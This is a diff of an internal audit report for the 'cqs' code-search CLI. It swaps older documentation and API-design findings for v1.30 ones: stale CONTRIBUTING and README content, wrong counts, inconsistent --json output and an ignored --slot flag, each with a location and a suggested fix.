+- **Description:** **P1: Docs Lying.** v1.30.0 #1097/#1114 collapsed five exhaustive matches (`Commands::batch_support`, `variant_name`, dispatch Group A, dispatch Group B, batch classification) into one `for_each_command!` table in `src/cli/registry.rs`. registry.rs:8-21 says: "Adding a new command now means: declare the variant in `definitions.rs::Commands`, add one row to either `group_a` or `group_b` list below, implement the handler. A missing row is a compile error." The contributing checklist still says: "**Dispatch** — match arm in `src/cli/dispatch.rs`" with no mention of `registry.rs`. A new contributor following the checklist will edit dispatch.rs (which now generates from registry) and either fail to compile or paste an arm into the wrong file. Architecture Overview at line 154-158 also lists `dispatch.rs` but never mentions `registry.rs`.
+- **Suggested fix:** (1) Replace step 4 with: "**Registry row** — add a `(bind, wild, name, batch_support, body)` row to `group_a` or `group_b` in `src/cli/registry.rs`; the macro generates dispatch + variant_name + batch_support". (2) Add `registry.rs - for_each_command! table; single source of truth for dispatch + variant_name + batch_support` next to `dispatch.rs` in the Architecture Overview block.
 
-#### CONTRIBUTING.md Architecture Overview missing 6 top-level source files / directories
-- **Difficulty:** medium
-- **Location:** `CONTRIBUTING.md:152-323`
-- **Description:** The `src/` tree enumeration misses six items that exist on disk: `aux_model.rs` (HF repo id vs local path detection), `daemon_translate.rs` (CLI → batch command translation for daemon ping), `eval/` (eval harness code; see `src/eval/`), `fs.rs` (atomic replace helper from audit #981), `limits.rs` (env-var limit parsing), and `serve/` (v1.29.0 web UI with `assets/vendor/`). Compare `ls /mnt/c/Projects/cqs/src/` with CONTRIBUTING.md: every other top-level entry is described, these six are simply absent.
-- **Suggested fix:** Add entries under the right sections of the architecture overview:
-  - `aux_model.rs - HuggingFace repo id vs local path detection for model resolution`
-  - `daemon_translate.rs - Translate CLI Commands to BatchCmd for daemon ping forwarding`
-  - `eval/ - Eval harness: pool generation, ablation runs, per-category dashboards`
-  - `fs.rs - atomic_replace helper (cross-fs rename fallback, canonicalized)`
-  - `limits.rs - Env var limit parsing helpers (bounded numeric parsing)`
-  - `serve/ - cqs serve web UI (v1.29.0): HTTP server, 4 views, embedded Cytoscape / Three.js / 3d-force-graph bundles`
-
-#### `src/hnsw/build.rs:39` docstring points at nonexistent `cli/commands/index.rs`
+#### DOC-V1.30-5: README "Claude Code Integration" command list missing 5 user-facing commands (`ping`, `eval`, `model`, `serve`, `refresh`)
 - **Difficulty:** easy
-- **Location:** `src/hnsw/build.rs:38-40`
-- **Description:** Docstring reads: `/// # Production routing /// /// `build_hnsw_index()` in `cli/commands/index.rs` unconditionally uses /// `build_batched_with_dim()` with 10k-row batches for all index sizes.` — but `cli/commands/index.rs` does not exist. It's `src/cli/commands/index/build.rs:781` now (module was split into a directory). The `index/` module is a directory with `build.rs`, `gc.rs`, `stale.rs`, `stats.rs`, plus `mod.rs`. A grep for `pub(crate) fn build_hnsw_index` only hits `src/cli/commands/index/build.rs:781`.
-- **Suggested fix:** Replace `cli/commands/index.rs` with `cli/commands/index/build.rs` in the docstring.
+- **Location:** `README.md:467-525`
+- **Description:** The `<claude>` integration block tells agents to install this list as their CLAUDE.md command reference. `cqs --help` shows 53 top-level commands; the README list omits: `cqs ping` (daemon healthcheck), `cqs eval` (eval harness, v1.29.x first-class), `cqs model` (show/list/swap embedding model — referenced by `audit-mode.json` doc and CHANGELOG), `cqs serve` (flagship v1.29.0 web UI; DOC-V1.29-2 noted absence in usage section but it's also missing from the agent-facing list), `cqs refresh` / `cqs invalidate` (added v1.30.0 per CHANGELOG line 22). Agents whose CLAUDE.md is bootstrapped from this list won't know these commands exist.
+- **Suggested fix:** Append five lines mirroring the existing format, with a one-sentence summary each. `serve` should link to the auth-token launch banner.
 
-#### `.claude/skills/troubleshoot/SKILL.md` references nonexistent files and wrong default model
+#### DOC-V1.30-6: README "Claude Code Integration" lists `cqs cache stats/prune/compact` — actual subcommands are `stats/clear/prune/compact`
 - **Difficulty:** easy
-- **Location:** `.claude/skills/troubleshoot/SKILL.md:28,54`
-- **Description:** Two stale refs still in the troubleshoot skill after the v1.27 audit wave-2 sweep partially touched it:
-  1. Line 28: `Should contain `index.db` and `hnsw.bin`. If missing: `cqs init && cqs index`.` — there is no `hnsw.bin`. Actual HNSW files in `.cqs/` are `index.hnsw.data`, `index.hnsw.graph`, `index.hnsw.ids`, `index.hnsw.checksum` (per `SECURITY.md:71` pattern `.cqs/index.hnsw.*`). The skill was last touched when HNSW used a single-file layout that no longer matches reality.
-  2. Line 54: `ls -la ~/.cache/huggingface/hub/models--intfloat--e5-base-v2/` — says the default model is E5-base, but the actual default is BGE-large (`CQS_EMBEDDING_MODEL | bge-large` per README line 706; `Default: BAAI/bge-large-en-v1.5` per PRIVACY.md line 32).
-- **Suggested fix:** Line 28: replace `hnsw.bin` with `index.hnsw.*`. Line 54: replace the path with `~/.cache/huggingface/hub/models--BAAI--bge-large-en-v1.5/` or make the check model-agnostic (`ls -la ~/.cache/huggingface/hub/ | grep models--`).
+- **Location:** `README.md:521`
+- **Description:** `cqs cache --help` shows four subcommands: `stats`, `clear`, `prune`, `compact`. README and CLAUDE-Code line says only `stats/prune/compact`. `clear` is the destructive "delete all cached embeddings (or only for a model fingerprint)" — useful and dangerous, should be in agent docs.
+- **Suggested fix:** Change `cqs cache stats/prune/compact` to `cqs cache stats/clear/prune/compact` and document `clear --model <fp>` semantics in the trailing sentence.
 
-#### `TODO(docs-agent): document this rule in CONTRIBUTING.md` unaddressed after landing
+#### DOC-V1.30-7: README claims "544-query dual-judge eval" in TL;DR — actual eval is 218 queries (109 test + 109 dev)
 - **Difficulty:** easy
-- **Location:** `src/cli/args.rs:553`, `src/cli/definitions.rs:637`
-- **Description:** Both `IndexArgs::dry_run` (line 553) and the `Convert` subcommand's `dry_run` (line 637) carry an identical docstring block: `/// Audit P2 #38: per the CONTRIBUTING "Dry-Run vs Apply" rule, side-effect /// commands (`index`, `convert`) default to mutating; analyser commands /// (`doctor`, `suggest`) default to read-only and require `--fix`/`--apply` /// to mutate. TODO(docs-agent): document this rule in CONTRIBUTING.md.` The rule is still only captured in the source docstring — grep `Dry-Run\|dry-run\|dry run` in CONTRIBUTING.md returns 0 matches. Since this rule governs why `index`/`convert` behave opposite to `doctor`/`suggest`, it belongs in the user-facing contributor doc, not buried in clap arg attributes.
-- **Suggested fix:** Add a short subsection in CONTRIBUTING.md (e.g., after "Adding a New CLI Command"): `### Dry-Run vs Apply — side-effect commands default to mutating\n\nSide-effect commands (\`cqs index\`, \`cqs convert\`) default to writing and expose \`--dry-run\` for preview. Analyser commands (\`cqs doctor\`, \`cqs suggest\`) default to read-only and require \`--fix\` / \`--apply\` to mutate. This split matches user expectation for each family.` Then remove the TODO lines from both `cli/args.rs:553` and `cli/definitions.rs:637`.
+- **Location:** `README.md:5` (TL;DR) vs `README.md:649` (eval section)
+- **Description:** TL;DR headline boasts "**42.2% R@1 / 67.0% R@5 / 83.5% R@20 on a 544-query dual-judge eval against the cqs codebase itself**". The actual Retrieval Quality section twelve hundred lines later says "**Live codebase eval** — 218 queries (109 test + 109 dev)". 544 doesn't appear anywhere else in the codebase or eval scripts; per memory the v3.v2 fixture is 109/109. Per memory + CHANGELOG #1109 "v3.v2 fixture refreshed 2026-04-25", the test R@5 is now 63.3% (74.3% dev) — the 67.0% is also the canonical pre-refresh number, not current. The "544" is likely a hangover from an earlier fixture (v2 had ~272 each split = 544 total).
+- **Suggested fix:** Replace "544-query" with "218-query (109 test + 109 dev) v3.v2" and either pin the metrics to a specific commit ("on commit X") or refresh to the current 63.3% / 74.3% (test R@5 / dev R@5). Both numbers should match between TL;DR and the table.
 
-#### README.md `## Performance` section pinned to v1.27.0 eval file that predates two releases
+#### DOC-V1.30-8: README "54 languages" claim conflicts with Cargo.toml (lang-elm now in default features) and source code (52 lang variants)
 - **Difficulty:** easy
-- **Location:** `README.md:822-833`, `evals/performance-v1.27.0.json`
-- **Description:** README line 823 says: `Measured 2026-04-16 on the cqs codebase itself (562 files, 15,516 chunks) with CUDA GPU (NVIDIA RTX A6000, 48 GB) on WSL2 Ubuntu. Embedder: BGE-large (1024-dim). SPLADE: ensembledistil (110M, off-the-shelf). Raw measurements: [\`evals/performance-v1.27.0.json\`](evals/performance-v1.27.0.json).` The chunk count `15,516` is pre-`.cqsignore` (`.cqsignore` dropped the corpus to `15,488` chunks per CHANGELOG line 21 and PROJECT_CONTINUITY.md line 57). The referenced file `performance-v1.27.0.json` is the only performance-*.json in evals/ — no v1.28.x or v1.29.0 refresh exists. Two point releases later the measurement is technically still the current "latest run," but the filename version pin misleads readers into thinking either the measurement is stale or there's a later file they can't find.
-- **Suggested fix:** Rename the file to `performance-latest.json` (or copy it forward as `performance-v1.29.0.json` and update the link) so the version-in-filename convention matches the README version. Also update `(562 files, 15,516 chunks)` to reflect the current corpus if you re-run, or add a note: "Measurement from v1.27.0; retrieval pipeline unchanged through v1.29.0 so latencies still hold; chunk count is now 15,488 after `.cqsignore` landed in v1.29.0."
+- **Location:** `README.md:5`, `README.md:530-585` (Supported Languages list), `CONTRIBUTING.md:135,187` vs `src/language/mod.rs` (`define_languages!`) and `Cargo.toml:179` (`default = [..., "lang-elm", ...]`)
+- **Description:** README repeats "54 languages" three times (TL;DR, Supported Languages header, How It Works step 1). The Supported Languages list itself shows 53 bullet items and never mentions Elm, despite `lang-elm` being in Cargo.toml's default feature list and `Elm => "elm", feature = "lang-elm"` registered in `src/language/mod.rs`. `define_languages!` macro emits 52 language variants when grepped (count includes Markdown but excludes ASPX/Razor/Vue/Svelte/HTML which delegate to other grammars per existing readme prose). Mismatch is small but the README list literally omits Elm — search for "Elm" returns zero hits in README.md.
+- **Suggested fix:** Either (a) recount and replace "54" with the audited count (likely 53 or 52 depending on whether Markdown / multi-grammar dispatch counts) and add an Elm bullet to the alphabetical list, or (b) remove `lang-elm` from default if Elm support is not actually shipping. Plumb the count through `language/mod.rs` registry length so it can't drift again.
 
----
+#### DOC-V1.30-9: SECURITY.md "Read Access" table omits per-project embeddings cache (`<project>/.cqs/embeddings_cache.db`)
+- **Difficulty:** easy
+- **Location:** `SECURITY.md:65-82`
+- **Description:** The Read Access filesystem table lists only the legacy global cache `~/.cache/cqs/embeddings.db`. v1.30.0 (PR #1105) added a per-project cache at `<project>/.cqs/embeddings_cache.db` (`src/cache.rs:91-93::project_default_path`) that is now the primary cache; the global one is consulted on miss for back-compat (PRIVACY.md gets this right at lines 16-20). A security reviewer reading SECURITY.md will think there's only one cache file to consider.
+- **Suggested fix:** Add a row to both Read Access and Write Access tables: `<project>/.cqs/embeddings_cache.db` — Per-project embedding cache (#1105, primary; legacy global cache at `~/.cache/cqs/embeddings.db` is fallback) — `cqs index`, search.
+
+#### DOC-V1.30-10: `enumerate_files` doc comment claims "Respects .gitignore" — also layers `.cqsignore` when `no_ignore=false`
+- **Difficulty:** easy
+- **Location:** `src/lib.rs:542-547` doc comment vs body at `src/lib.rs:566-569`
+- **Description:** Public-API doc says: "Respects .gitignore, skips hidden files and files larger than `CQS_MAX_FILE_SIZE` bytes". The body adds `wb.add_custom_ignore_filename(".cqsignore")` when `no_ignore` is false (`lib.rs:567-569`). `.cqsignore` is the headline v1.29.0 feature for excluding files committed to git but never indexed; library consumers calling `cqs::enumerate_files` need to know the function honours it (or reconfigure if they don't want it). Body comment at line 560-565 explains the rationale but the function's outer doc comment doesn't surface it.
+- **Suggested fix:** Update the doc comment to: "Respects `.gitignore` and `.cqsignore` (additive on top of `.gitignore`, both disabled by `no_ignore=true`); skips hidden files and files larger than `CQS_MAX_FILE_SIZE` bytes (default 1 MiB — generated code can exceed this)."
+
 
 ## API Design
 
-#### `cqs --json project list` / `project remove` silently emit text, ignoring --json
+#### `cqs --json model swap <bad-preset>` emits plain-text error, not envelope JSON
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/project.rs:90-108,110-118` (`ProjectCommand::List` and `ProjectCommand::Remove` — no `--json` field, no `TextJsonArgs` flatten)
-- **Description:** `cqs --json project list` and `cqs --json project remove foo` print plain text ("No projects registered.", "Removed 'foo'") even when the top-level `--json` flag is set. Verified with `cqs --json project list`: emits `No projects registered.` on stdout. Breaks programmatic consumers that assume `cqs --json <anything>` emits JSON. `cqs ref list` was already fixed to take `TextJsonArgs` (see `src/cli/commands/infra/reference.rs:54-58`); `project list`/`remove` were missed by the sweep. Same class of bug as post-v1.27.0 P1 #8 (`cqs --json project search` ignored `--json`), but on the sibling subcommands.
-- **Suggested fix:** Change `ProjectCommand::List` and `ProjectCommand::Remove` to carry `#[command(flatten)] output: TextJsonArgs`, route `cli.json || output.json` into the handlers, and emit an envelope JSON payload (`{projects: [...]}` for list, `{status: "removed"|"not_found", name}` for remove) via `crate::cli::json_envelope::emit_json`. Mirrors what `cqs ref list` already does.
+- **Location:** `src/cli/commands/infra/model.rs:cmd_model_swap` (the `Unknown preset 'X'.` `anyhow::anyhow!` and the `No index at ...` `bail!`) and the parallel `cmd_model_show` `bail!` for missing-index.
+- **Description:** `cqs --json model swap nonexistent-preset` prints `Error: Unknown preset 'nonexistent-preset-zzz'. ...` to stderr and exits non-zero — no JSON envelope. Verified live. Compare to `cqs --json ref remove nonexistent-zzz` which emits `{"data":null,"error":{"code":"not_found","message":"..."}, "version":1}` via `json_envelope::emit_json_error`. Same `--json` global flag, two different error contracts. Agents driving model swaps from CI can't differentiate "bad preset" from "transient I/O failure" because the surface looks identical (stderr text + non-zero exit). `cmd_model_show`'s `No index at ...` `bail!` has the same shape problem on the read path. The v1.30.0 audit fixed this for `ref/project/telemetry`; `model` was missed.
+- **Suggested fix:** Wrap the `anyhow::anyhow!`/`bail!` sites in `cmd_model_swap` and `cmd_model_show` so that when `json: bool` is true they route through `json_envelope::emit_json_error` with codes `unknown_preset`, `no_index`, `already_on_target` (the no-op short-circuit), and `swap_failed`. Pattern is already established in `cmd_ref_remove` (`src/cli/commands/infra/reference.rs`).
 
-#### `cqs --json ref {add, remove, update}` silently emit text, ignoring --json
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/reference.rs:42-69` (`RefCommand::Add`, `RefCommand::Remove`, `RefCommand::Update` have no `TextJsonArgs`)
-- **Description:** `cqs --json ref add foo /path` and `cqs --json ref remove bar` emit plain-text status (or a text `anyhow::Error`) even with `--json`. Verified: `cqs --json ref remove nonexistent-reference` prints `Error: Reference 'nonexistent-reference' not found in config.` on stderr. An agent driving config via JSON can't differentiate "already absent" (idempotent success) from "real error" (bad args) because there is no envelope. Same class as the `project list`/`remove` finding but on the reference-index mutations.
-- **Suggested fix:** Add `#[command(flatten)] output: TextJsonArgs` to each of the three variants. Convert the handlers (`cmd_ref_add`, `cmd_ref_remove`, `cmd_ref_update`) to emit `{status, name, weight?}` envelopes when `--json` is set, and return a typed `not_found` error code via the shared `json_envelope::emit_json_error` path.
-
-#### `cqs telemetry --reset --json` silently drops --json; handler prints text
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/telemetry_cmd.rs:520-578` (`cmd_telemetry_reset`) and dispatch at `src/cli/dispatch.rs:147-158`
-- **Description:** `cqs telemetry --reset --json` prints `Archived 44912 events to telemetry_20260423_231842.jsonl` on stdout — plain text, not JSON. Verified live. The dispatch in `dispatch.rs:153-157` routes around the `--json` flag entirely: `if reset { cmd_telemetry_reset(&cqs_dir, reason.as_deref()) } else { cmd_telemetry(..., cli.json || output.json, all) }`. The reset path gets no json arg, and `cmd_telemetry_reset` has no json parameter. Same top-level `--json` swallow as post-v1.27.0 P1 #8 but on a mutating action.
-- **Suggested fix:** Thread `cli.json || output.json` into `cmd_telemetry_reset` as a `json: bool` parameter. When true, emit `{archived_events, archive_path, lock_path}` via `emit_json`. Keep the existing text output for `json = false`. Update `dispatch.rs:153-157` to pass the flag.
-
-#### `cqs notes list --check` is accepted by the CLI but dropped by the daemon batch dispatch
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/io/notes.rs:51-64` defines `--check` on `NotesCommand::List`; `src/cli/args.rs:527-540` defines `NotesListArgs` (shared with batch) WITHOUT `--check`; `src/cli/batch/handlers/misc.rs:85-118` (`dispatch_notes`) has no `check` parameter and never calls `suggest::check_note_staleness`.
-- **Description:** `cqs notes list --check` on the CLI populates a `stale_mentions` field per note by running `check_note_staleness` (see `src/cli/commands/io/notes.rs:544-593`). The daemon path — selected automatically when the daemon is running — parses into `NotesListArgs` which has only `warnings` and `patterns`. `BatchCmd::Notes` accepts `--check` as a parsed-but-unused flag via the `TextJsonArgs` carrier? No — `NotesListArgs` has no `check` field, so `echo 'notes --check' | cqs batch` will error "unexpected argument `--check`", AND `cqs notes list --check` routed to daemon produces a response without `stale_mentions` populated. Agents who rely on staleness info silently lose it when the daemon is up. Cross-refs the `NotesCommand::List` vs `NotesListArgs` split documented at `src/cli/args.rs:527-531`.
-- **Suggested fix:** Add `pub check: bool` (with `#[arg(long)]`) to `NotesListArgs`. Extend `dispatch_notes` to accept the flag and call `cqs::suggest::check_note_staleness` when set, producing the same `stale_mentions: Option<Vec<String>>` shape as the CLI. Mirrors the wave-1 fix for `cqs stale --count-only` missing on batch (API-V1.25-2).
-
-#### Daemon `dispatch_drift` / `dispatch_diff` emit `file` via `.display().to_string()` — CLI uses `normalize_path`
-- **Difficulty:** easy
-- **Location:** `src/cli/batch/handlers/misc.rs:277, 353, 365, 377` (all four uses of `e.file.display().to_string()`) vs `src/cli/commands/io/drift.rs:53` (`build_drift_output` uses `normalize_path`)
-- **Description:** The daemon-side drift/diff handlers emit divergent file-path shapes compared to the CLI. CLI `cmd_drift` uses `normalize_path(&e.file)` (normalizes backslashes to forward slashes on Windows, strips UNC `\\?\` prefixes — the same invariant `cqs stale --json` and `cqs search --json` apply after P1 #19 in v1.27.0). Daemon `dispatch_drift` and `dispatch_diff` both use `e.file.display().to_string()`, which emits OS-native path separators. On Windows / WSL mixed projects, a consumer comparing `drift[].file` or `diff[].{added,removed,modified}[].file` to file paths from other `--json` commands gets mismatches (`src\\foo.rs` from daemon, `src/foo.rs` from CLI). Four call sites affected, same bug class.
-- **Suggested fix:** Replace all four `e.file.display().to_string()` with `cqs::normalize_path(&e.file)` in `src/cli/batch/handlers/misc.rs`. Then factor the shared `DriftEntryOutput` / diff-entry serializers into `src/cli/commands/io/` so future field additions stay single-source.
-
-#### `BatchCmd::Refresh` / `invalidate` has no CLI surface; agents can't invalidate daemon caches
+#### `cqs init`, `cqs index`, `cqs convert` lack `--json` despite being the headline mutation surface
 - **Difficulty:** medium
-- **Location:** `src/cli/batch/commands.rs:302-304` (`BatchCmd::Refresh`, visible alias `invalidate`) — no matching `Commands::Refresh` variant in `src/cli/definitions.rs:287+`
-- **Description:** The daemon batch surface exposes a `Refresh` / `invalidate` verb that drops cached `hnsw`, `splade_index`, `call_graph`, `test_chunks`, `notes`, and refs — useful when a user edits the index out-of-band (e.g. `cqs model swap` that crashed mid-run, a manual SQLite patch, or a reference that got reindexed in another shell). It's only reachable via `echo 'refresh' | cqs batch` or direct socket send. There's no `cqs refresh` subcommand, no `cqs --invalidate` flag. Agents that know they mutated the index under the daemon have no first-class way to tell the daemon to re-read, so they fall back to `systemctl --user restart cqs-watch` or `CQS_NO_DAEMON=1`. This is a CLI/batch asymmetry directly relevant to agent ergonomics.
-- **Suggested fix:** Add `Commands::Refresh` (and a clap `visible_alias = "invalidate"`) to the CLI definitions. Classify as `BatchSupport::Daemon` so it forwards to the daemon when present (its whole purpose is cache invalidation on the running daemon) and no-ops cleanly otherwise. Update `src/cli/dispatch.rs` with a one-line arm that forwards through `try_daemon_query` or bails cleanly ("no daemon running, nothing to refresh").
+- **Location:** `src/cli/commands/infra/init.rs:cmd_init`; `src/cli/commands/index/build.rs:cmd_index` (and `IndexArgs` in `src/cli/args.rs:567+` has no `json` field); `src/cli/commands/index/convert.rs` (no `json` flag).
+- **Description:** `cqs init`, `cqs index`, and `cqs convert` are the only path for an agent to bootstrap or refresh an index. None of the three accept `--json`. `cqs index --json` errors with `unexpected argument '--json'`; `cqs init --json` likewise. Every other long-running command (`cqs gc`, `cqs model swap`, `cqs index` peer commands) already supports `--json`. The result is that an automation pipeline that wraps `cqs init && cqs index --llm-summaries` can't capture timing/byte/chunk-count metrics structurally — it has to scrape colored stdout. Particularly painful for `cqs index --llm-summaries --improve-docs` which spends real money and has no machine-readable summary on completion. The CONTRIBUTING "Dry-Run vs Apply" comment in the code already lumps `index` and `convert` as "side-effect commands"; both should also be the `--json`-emitting commands.
+- **Suggested fix:** Add `#[arg(long)] pub json: bool` to `IndexArgs`, the new `InitArgs` (currently no args struct — need to introduce one), and `ConvertArgs`. Thread `cli.json || args.json` through `cmd_init` / `cmd_index` / `cmd_convert` and emit a final `{indexed_files, indexed_chunks, took_ms, model, summaries_added?, docs_improved?}` (or analog) envelope via `json_envelope::emit_json` after the work completes. Suppress the per-step progress lines when `json` is set (or route them to stderr — doctor already does this with "Colored human-readable check progress is routed to stderr in this mode").
 
-#### `cqs eval --limit` diverges from every other query command's `-n, --limit`
+#### Global `--slot` is silently ignored by every `cqs slot` and `cqs cache` subcommand
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/eval/mod.rs:46-48` (`--limit` without `short = 'n'`)
-- **Description:** Every query-returning subcommand uses `#[arg(short = 'n', long, default_value = "5")]` for its result cap (`search`, `callers`, `similar`, `scout`, `gather`, `explain`, `test-map`, `related`, `where`, `deps`, `onboard`, `plan`, `task`, `drift`, `blame`'s `-n, --commits`, `neighbors`, `project search`). `cqs eval --limit 20` works but `cqs eval -n 20` errors. `cqs train-pairs --limit` has the same gap. Agents that build commands from a template (`--limit N`) don't notice but humans doing `cqs eval -n 10` hit a surprise. Minor footgun.
-- **Suggested fix:** Add `short = 'n'` to `EvalCmdArgs::limit` and `TrainPairs::limit`. One-token change per file, zero breakage since no caller uses `-n` today.
+- **Location:** `src/cli/definitions.rs` (`pub slot: Option<String>` declared with `#[arg(long, global = true)]`); `src/cli/commands/infra/slot.rs` (`SlotCommand::Create/Promote/Remove` take a positional `name` and never read `cli.slot`); `src/cli/commands/infra/cache_cmd.rs:resolve_cache_path` (no `cli.slot` reference, cache is project-scoped, not per-slot).
+- **Description:** `--slot <NAME>` is `global = true` on the top-level `Cli`, so it appears in every subcommand's `--help` (verified: `cqs slot create --help`, `cqs slot promote --help`, `cqs slot remove --help`, `cqs cache stats --help` all advertise `--slot <SLOT>`). For `slot create/promote/remove/active` and the entire `cache` subtree it's a no-op: `slot create foo --slot bar` creates `foo` and ignores `bar` (verified live), `cache stats --slot foo` opens the project-wide cache regardless. The help text actively lies about supported behaviour — agents reading `--help` will conclude they can scope cache ops to a slot. This is the worst kind of API drift: the flag works, parses, and is silently dropped.
+- **Suggested fix:** Move `--slot` off `global = true` and onto only the subcommands that actually consume it (every `Commands::*` that ends up calling `cqs::slot::resolve_slot_name` or threads slot into `CommandContext`). For `slot create/promote/remove/active` and `cache *`, keep `--slot` off the surface entirely. Alternative: enforce at dispatch time — `if cli.slot.is_some() && !subcommand_uses_slot { bail!("--slot has no effect on `cqs {subcommand}`") }` — louder than silent-drop, cheap to implement.
 
-#### Pretty/compact JSON output drifts between CLI path and daemon path
+#### `cqs refresh` has no `--json`; every other infra command does
 - **Difficulty:** easy
-- **Location:** `src/cli/dispatch.rs:786-790` (daemon response passed through `serde_json::to_string(other)` — compact) vs `src/cli/json_envelope.rs:242-251` (CLI `emit_json` uses `to_string_pretty` — multi-line)
-- **Description:** `cqs --json impact-diff` emits compact single-line JSON when the daemon is running, pretty multi-line JSON when `CQS_NO_DAEMON=1`. Verified: `CQS_NO_DAEMON=1 cqs --json impact-diff` starts with `{\n  "data":...` while `cqs --json impact-diff` (daemon path) starts with `{"data":...`. Every other CLI subcommand has the same split. Agents / humans rely on output shape for diffing eval logs across runs; the two surfaces produce byte-different outputs for the same inputs. Not a bug for `jq` consumers but is a bug for snapshot tests and diff-review workflows.
-- **Suggested fix:** In `try_daemon_query` (`src/cli/dispatch.rs:786-790`), use `serde_json::to_string_pretty` instead of `to_string` on the non-string `Value` arm, so the CLI-side output is pretty in both modes. Alternatively, switch `emit_json` to compact in both and pretty-print only when stdout is a TTY (matches `git`/`gh` conventions). Former is the zero-risk one.
+- **Location:** `src/cli/definitions.rs:755-761` (`Commands::Refresh` — no JSON arg), and `src/cli/registry.rs` dispatch arm.
+- **Description:** `cqs refresh` (alias `invalidate`) is the user-facing surface for the daemon's cache-drop verb. It returns no JSON output — verified, `cqs --json refresh` prints plain text. Compare to `cqs ping --json`, `cqs gc --json`, `cqs cache compact --json`, `cqs telemetry --reset --json`, `cqs slot promote foo --json` — every other infra-mutation/healthcheck supports `--json`. An agent that just promoted a slot needs `refresh` followed by a query; without `--json` it can't confirm "cache invalidated, re-open succeeded" structurally. Was caught in v1.30.0 audit as missing CLI surface (added) but the new entry shipped without the standard JSON contract.
+- **Suggested fix:** Add `#[command(flatten)] output: TextJsonArgs` to `Commands::Refresh`, thread into the dispatch arm, and emit `{"refreshed": true, "daemon_running": bool, "caches_invalidated": [...]}` when the flag is set. The daemon-side `dispatch_refresh` (`src/cli/batch/handlers/refresh.rs` or wherever it lives) likely already returns a JSON object — surface it on the CLI path too.
 
-#### `--expand` on `cqs search` vs `--expand-parent` on top-level `cqs <QUERY>` — same semantic, two names
+#### List-shape JSON envelopes are inconsistent across `*list` commands
 - **Difficulty:** easy
-- **Location:** `src/cli/args.rs:122-124` (`SearchArgs::expand`, flag `--expand`) vs `src/cli/definitions.rs:234-235` (`Cli::expand_parent`, flag `--expand-parent`)
-- **Description:** The top-level `Cli` struct renamed the parent-context flag from `--expand` to `--expand-parent` to avoid colliding with `gather --expand <N>` (see the API-V1.22-3 comment). But `SearchArgs` (used by `BatchCmd::Search` AND by the flattened search args inside `Commands::Search` if it existed — actually `search` is not a named subcommand on CLI, only on batch) still exposes `--expand`. That means `echo 'search foo --expand' | cqs batch` works, `cqs search foo --expand` works in batch-mode only, but `cqs --expand-parent foo` is required at the top level. Three words for one concept across three slightly-overlapping surfaces. An agent batching `search foo --expand-parent` gets an error; batching `search foo --expand` works.
-- **Suggested fix:** Rename `SearchArgs::expand` to `SearchArgs::expand_parent` with `long = "expand-parent"`, matching the top-level. Zero-risk rename — the tests in `src/cli/definitions.rs:1016-1038` already pin the top-level spelling; update the single batch-surface callsite. If backcompat is wanted, add `visible_alias = "expand"` and remove on v2.
+- **Location:** `src/cli/commands/infra/reference.rs:cmd_ref_list` (raw array); `src/cli/commands/infra/model.rs:cmd_model_list` (raw array); `src/cli/commands/infra/project.rs:124-140` (object `{projects: [...]}`); `src/cli/commands/infra/slot.rs:slot_list` (object `{active, slots: [...]}`); `src/cli/commands/io/notes.rs:cmd_notes_list` (object `{notes: [...]}`); `src/cli/commands/search/query.rs` (object `{query, results, total}`).
+- **Description:** Verified live: `cqs ref list --json` emits `{"data":[{...},{...}], "error":null, "version":1}` (raw array under `data`). `cqs project list --json` emits `{"data":{"projects":[...]}, ...}` (object under `data`). `cqs slot list --json` emits `{"data":{"active":"default","slots":[...]}, ...}`. `cqs model list --json` emits `{"data":[{...}], ...}` (raw array). Five `*list --json` surfaces, three different shape conventions. Agents writing a generic `data.{slots,projects,refs,models,notes}` accessor have to special-case ref and model. The right convention is the wrapping-object form — it leaves room for sibling fields like the slot-list `active` summary or the search `total` count without breaking the schema.
+- **Suggested fix:** Standardize on `{"data": {"<plural-name>": [...]}}` for every list-emitting subcommand. Concretely: change `cmd_ref_list` to emit `{"references": [...]}` and `cmd_model_list` to emit `{"models": [...], "current": "<name>"}` (the latter folds the `current: bool` per-row flag into a top-level `current` field — cleaner). Hard rename, no-external-users; ship it as a single PR that touches both call sites + their tests.
 
-#### `--depth` short-flag `-d` present on `cqs onboard`, absent on `cqs impact` and `cqs test-map`
+#### `cqs cache stats` JSON mixes byte and megabyte units; `cache compact` uses bytes only
 - **Difficulty:** easy
-- **Location:** `src/cli/args.rs:349-351` (`OnboardArgs::depth` has `short = 'd'`) vs `src/cli/args.rs:174-176` (`ImpactArgs::depth` — no short) and `src/cli/args.rs:322-324` (`TestMapArgs::depth` — no short)
-- **Description:** Three commands expose `--depth <N>` with exactly the same semantic (search / BFS depth in the call graph) but only `onboard` has the `-d` short flag. Humans muscle-memory-typing `cqs impact foo -d 3` get "unexpected argument '-d' found". Post-v1.27.0 already caught the parallel issue of `--depth` having three different meanings (blame commits, onboard callee depth, test-map BFS); that was fixed on blame with the rename to `--commits`. The short-flag is the remaining inconsistency across the three that legitimately share semantics (all three are "call-graph search depth").
-- **Suggested fix:** Either (a) add `short = 'd'` to both `ImpactArgs::depth` and `TestMapArgs::depth` for symmetry with onboard, or (b) remove `short = 'd'` from onboard for unified `--depth`-only. Option (a) is easier for humans; (b) is stricter for the no-short-flag-collisions stance elsewhere. Neither costs backcompat since all three are internal-only.
+- **Location:** `src/cli/commands/infra/cache_cmd.rs:cache_stats` (emits both `total_size_bytes` AND `total_size_mb`) vs `cache_compact` (emits `reclaimed_bytes`, `size_after_bytes`, `size_before_bytes`).
+- **Description:** Verified: `cqs cache stats --json` emits `total_size_bytes: 1662976, total_size_mb: 1.5859375` — same number, two units. `cqs cache compact --json` emits `reclaimed_bytes / size_after_bytes / size_before_bytes` — bytes only. An agent computing "free space saved" has to special-case which fields are present per command. Mixed-unit fields are also fragile: a future SI-vs-binary correction (1024 vs 1000) silently shifts `*_mb` while `*_bytes` stays correct, producing two-source-of-truth bugs.
+- **Suggested fix:** Drop `total_size_mb` from `cache_stats` JSON (keep it in the human text path where the caller wants a digestible number). Bytes are the canonical unit across the rest of cqs (`size_*_bytes` already in `compact`, `chunks` are counts not sizes). For human stdout, format-on-display.
 
